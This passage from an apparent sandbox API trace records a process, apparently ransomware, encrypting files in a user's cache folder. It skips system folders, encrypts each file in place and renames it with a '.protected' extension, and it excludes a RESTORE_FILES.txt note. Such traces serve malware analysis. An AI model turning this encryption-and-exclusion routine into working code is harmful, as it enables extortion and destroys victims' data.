lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.432] CloseHandle (hObject=0x150) returned 1 [0088.432] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected") returned 161 [0088.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.protected")) returned 1 [0088.433] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Windows") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files (x86)") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="$Recycle.bin") returned 1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="System Volume Information") returned -1 [0088.433] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.433] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".protected") returned 0x0 [0088.433] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="RESTORE_FILES.txt") returned -1 [0088.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".rar") returned 0x0 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".zip") returned 0x0 [0088.434] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.435] CloseHandle (hObject=0x150) returned 1 [0088.435] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected") returned 161 [0088.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.protected")) returned 1 [0088.447] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Windows") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files (x86)") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="$Recycle.bin") returned 1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="System Volume Information") returned -1 [0088.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.447] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".protected") returned 0x0 [0088.447] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="RESTORE_FILES.txt") returned -1 [0088.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0088.449] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".rar") returned 0x0 [0088.449] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".zip") returned 0x0 [0088.449] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.450] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.450] CloseHandle (hObject=0x150) returned 1 [0088.450] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected") returned 161 [0088.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.protected")) returned 1 [0088.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Windows") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files (x86)") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="$Recycle.bin") returned 1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="System Volume Information") returned -1 [0088.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.458] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".protected") returned 0x0 [0088.458] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="RESTORE_FILES.txt") returned -1 [0088.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".rar") returned 0x0 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".zip") returned 0x0 [0088.462] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.463] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.463] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.463] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.463] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.463] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.463] CloseHandle (hObject=0x150) returned 1 [0088.463] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected") returned 161 [0088.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.protected")) returned 1 [0088.491] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Windows") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files (x86)") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="$Recycle.bin") returned 1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="System Volume Information") returned -1 [0088.491] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.491] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".protected") returned 0x0 [0088.491] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="RESTORE_FILES.txt") returned -1 [0088.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".rar") returned 0x0 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".zip") returned 0x0 [0088.493] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.494] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.494] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.495] CloseHandle (hObject=0x150) returned 1 [0088.495] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected") returned 161 [0088.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.protected")) returned 1 [0088.496] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Windows") returned -1 [0088.496] 